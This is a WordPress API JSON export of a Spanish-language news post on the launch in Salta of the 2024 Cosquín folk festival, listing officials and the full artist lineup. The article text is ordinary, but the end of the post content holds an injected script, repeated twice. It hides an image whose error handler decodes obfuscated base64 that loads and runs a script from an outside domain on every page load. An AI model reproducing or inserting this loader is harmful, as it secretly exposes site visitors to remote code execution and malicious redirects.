{"id":3357,"date":"2023-11-28T09:15:56","date_gmt":"2023-11-28T12:15:56","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=3357"},"modified":"2025-08-14T00:04:33","modified_gmt":"2025-08-14T03:04:33","slug":"se-presento-en-salta-la-edicion-2024-del-festival-cosquin","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=3357","title":{"rendered":"Se present\u00f3 en Salta la Edici\u00f3n 2024 del Festival Cosqu\u00edn"},"content":{"rendered":"\n<h5 class=\"wp-block-heading has-white-color has-vivid-cyan-blue-background-color has-text-color has-background\"><em>La Comisi\u00f3n organizadora decidi\u00f3 presentarlo para todo el pa\u00eds desde Salta, por la vinculaci\u00f3n entre la cultura salte\u00f1a a trav\u00e9s de sus cantores y el tradicional festival. Adem\u00e1s, el Ministerio de Turismo realizar\u00e1 acciones de promoci\u00f3n en enero en la ciudad cordobesa.<\/em><\/h5>\n\n\n\n<p>Aqu\u00ed Cosqu\u00edn! reson\u00f3 esta ma\u00f1ana en la Pe\u00f1a Balderrama la presentaci\u00f3n del reconocido Festival Nacional del Folclore que este a\u00f1o alcanza su edici\u00f3n 64, as\u00ed, autoridades salte\u00f1as y cordobesas dieron a conocer la importante grilla de artistas,&nbsp;que actuar\u00e1 en el escenario Atahualpa Yupanqui situado en la plaza Pr\u00f3spero Molina.<\/p>\n\n\n\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img fetchpriority=\"high\" decoding=\"async\" width=\"899\" height=\"600\" data-id=\"3358\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/11\/5375-se-presento-en-salta-la-edicion-2024-del-festival-cosquin.jpg\" alt=\"\" class=\"wp-image-3358\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/11\/5375-se-presento-en-salta-la-edicion-2024-del-festival-cosquin.jpg 899w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/11\/5375-se-presento-en-salta-la-edicion-2024-del-festival-cosquin-300x200.jpg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/11\/5375-se-presento-en-salta-la-edicion-2024-del-festival-cosquin-768x513.jpg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/11\/5375-se-presento-en-salta-la-edicion-2024-del-festival-cosquin-696x465.jpg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/11\/5375-se-presento-en-salta-la-edicion-2024-del-festival-cosquin-629x420.jpg 629w\" sizes=\"(max-width: 899px) 100vw, 899px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" width=\"899\" height=\"600\" data-id=\"3359\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/11\/93079-se-presento-en-salta-la-edicion-2024-del-festival-cosquin.jpg\" alt=\"\" class=\"wp-image-3359\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/11\/93079-se-presento-en-salta-la-edicion-2024-del-festival-cosquin.jpg 899w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/11\/93079-se-presento-en-salta-la-edicion-2024-del-festival-cosquin-300x200.jpg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/11\/93079-se-presento-en-salta-la-edicion-2024-del-festival-cosquin-768x513.jpg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/11\/93079-se-presento-en-salta-la-edicion-2024-del-festival-cosquin-696x465.jpg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/11\/93079-se-presento-en-salta-la-edicion-2024-del-festival-cosquin-629x420.jpg 629w\" sizes=\"(max-width: 899px) 100vw, 899px\" \/><\/figure>\n<\/figure>\n\n\n\n<p>El ministro de Turismo y Deportes,&nbsp;<strong>Mario Pe\u00f1a,<\/strong>&nbsp;estuvo acompa\u00f1ado por el intendente electo de Cosqu\u00edn,&nbsp;<strong>Ra\u00fal Cardinali<\/strong>&nbsp;e integrantes de la Comisi\u00f3n Municipal de Folclore de Cosqu\u00edn.<\/p>\n\n\n\n<p>Tambi\u00e9n estuvieron el secretario de Turismo y Cultura de la Ciudad Fernando Garc\u00eda Soria, el senador por General G\u00fcemes Carlos Rosso, el presidente de la C\u00e1mara de Turismo de Salta,&nbsp;<strong>Juan Lucero<\/strong>.<\/p>\n\n\n\n<p>La jornada se inici\u00f3 con la actuaci\u00f3n de Los Guitarreros y finaliz\u00f3 con Vale 4, conjuntos que actuar\u00e1n en Cosqu\u00edn junto a reconocidos solitas y agrupaciones distribuidos en nueve noches.<\/p>\n\n\n\n<p>El titular de la cartera tur\u00edstica,&nbsp;<strong>Mario Pe\u00f1a,<\/strong>&nbsp;agradeci\u00f3 la elecci\u00f3n de Salta para el lanzamiento de tan importante evento folcl\u00f3rico y record\u00f3 que en la \u00faltima Feria Internacional de Turismo (FIT) se habl\u00f3 de esta posibilidad que hoy se concreta. Asimismo, se\u00f1al\u00f3 la importancia tur\u00edstica de un encuentro musical que congrega cientos de visitantes donde Salta tendr\u00e1 presencia institucional con acciones de promoci\u00f3n al consumidor final.<\/p>\n\n\n\n<p>Por su parte, el intendente electo,&nbsp;<strong>Ra\u00fal Cardinali,<\/strong>&nbsp;manifest\u00f3 su gratitud al&nbsp;<strong>Gobierno de Salta<\/strong>&nbsp;y a Patricia Balderrama y se refiri\u00f3 que ser\u00e1 su primer festival como autoridad, para lo que lo acompa\u00f1a un muy importante equipo. Adem\u00e1s, inform\u00f3 que se incorporar\u00e1 el tango como expresi\u00f3n popular.<\/p>\n\n\n\n<p><strong>Juan Lucero<\/strong>&nbsp;manifest\u00f3 su orgullo de que tan importante festival se presente en Salta, en lo que &nbsp;coincidi\u00f3 con Patricia Balderrama, que abri\u00f3 su emblem\u00e1tica Pe\u00f1a para la presentaci\u00f3n.<\/p>\n\n\n\n<p>Finalmente el ministro Pe\u00f1a y el senador Rosso entregaron a Ra\u00fal Cardinali un busto del Gral. Mart\u00edn Miguel de G\u00fcemes.<\/p>\n\n\n\n<p>Los integrantes de la Comisi\u00f3n Organizadora Dami\u00e1n Torletti y Diego Olmos tuvieron a su cargo la presentaci\u00f3n de la grilla de artistas que actuar\u00e1n en las diferentes Lunas.<\/p>\n\n\n\n<p><strong>Grilla completa<\/strong><\/p>\n\n\n\n<p><strong>*- S\u00e1bado 20 de enero<\/strong>: Las Voces de Or\u00e1n, Franco Luciani, Horacio Banegas, Victoria Birchner, Ariel Ardit, Los Manseros Santiague\u00f1os, Flor Paz y Sergio Galleguillo.<\/p>\n\n\n\n<p><strong>*- Domingo 21 de enero<\/strong>: D\u00fao Coplanacu, Yamila Cafrune, Algarroba.com, Suna Rocha, Nahuel Pennisi, Marina Cornejo, Destino San Javier, El Indio Lucio Rojas.<\/p>\n\n\n\n<p><strong>*- Lunes 22 de enero<\/strong>: Orellana Lucca, Silvia Lallana, Milena Salamanca, Peteco Carabajal con Riendas Libres, Los D\u00edas Pasan Volando, Adri\u00e1n Maggi, Los Videla, Facundo Toro, Chaque\u00f1o Palavecino 40 a\u00f1os.<\/p>\n\n\n\n<p><strong>*- Martes 23 de enero<\/strong>: Pedro Aznar, V\u00edctor Heredia, Maggie Cullen, Ahyre, Grupo Vocal Argentino, Priscilla Ortiz, Gustavo Chazarreta, Raly Barrionuevo,<\/p>\n\n\n\n<p><strong>*- Mi\u00e9rcoles 24 de enero<\/strong>: Los 4 de C\u00f3rdoba &#8211; 55 a\u00f1os con amigos, Sebasti\u00e1n Ruiz, Por Siempre Tucu, Sergio Fasoli, Sof\u00eda Assis, Jos\u00e9 Luis Aguirre, Lucrecia Rodrigo, Los Carabajal, La Juntada &#8211; 20 a\u00f1os.<\/p>\n\n\n\n<p><strong>*- Jueves 25 de enero<\/strong>: N\u00e9stor Garnica, Quebrade\u00f1os, Tom\u00e1s Lip\u00e1n &#8211; Fortunato Ramos, Marina Gonz\u00e1lez, Emiliano Zerbini, La Bruja Salguero, Chango Spasiuk, La Delio Valdez y Los Tekis.<\/p>\n\n\n\n<p><strong>*- Viernes 26 de enero<\/strong>: Guitarreros, Ra\u00fal Barboza, Luc\u00eda Ceresani, Paz Mart\u00ednez, Los Nocheros, Diego Torres.<\/p>\n\n\n\n<p><strong>*- S\u00e1bado 27 de enero<\/strong>: La Callejera, Coroico, Yoel Hern\u00e1ndez, Delegaci\u00f3n de Jap\u00f3n, D\u00fao Aruma, Los Palmeras, Tango Corrupto, Soledad.<\/p>\n\n\n\n<p><strong>*- Domingo 28 de enero<\/strong>: Leando Lovato, D\u00fao Celesta, Juan Fuentes, Franco Orozco, Paola Bernal, Cuarteto Kare, Ceibo, Bel\u00e9n Herrera, Abel Pintos.&nbsp;<\/p>\n\n\n\n<figure class=\"wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio\"><div class=\"wp-block-embed__wrapper\">\n<iframe title=\"Se present\u00f3 en Salta la Edici\u00f3n 2024 del Festival Cosqu\u00edn\" width=\"696\" height=\"392\" src=\"https:\/\/www.youtube.com\/embed\/ZjM5islFSBA?feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share\" allowfullscreen><\/iframe>\n<\/div><\/figure>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>La Comisi\u00f3n organizadora decidi\u00f3 presentarlo para todo el pa\u00eds desde Salta, por la vinculaci\u00f3n entre la cultura salte\u00f1a a trav\u00e9s de sus cantores y el tradicional festival. Adem\u00e1s, el Ministerio de Turismo realizar\u00e1 acciones de promoci\u00f3n en enero en la ciudad cordobesa. Aqu\u00ed Cosqu\u00edn! reson\u00f3 esta ma\u00f1ana en la Pe\u00f1a Balderrama la presentaci\u00f3n del reconocido [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":3359,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[13],"tags":[],"class_list":{"0":"post-3357","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-festivales"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3357"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3357"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3357\/revisions"}],"predecessor-version":[{"id":6908,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3357\/revisions\/6908"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/3359"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3357"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3357"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3357"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}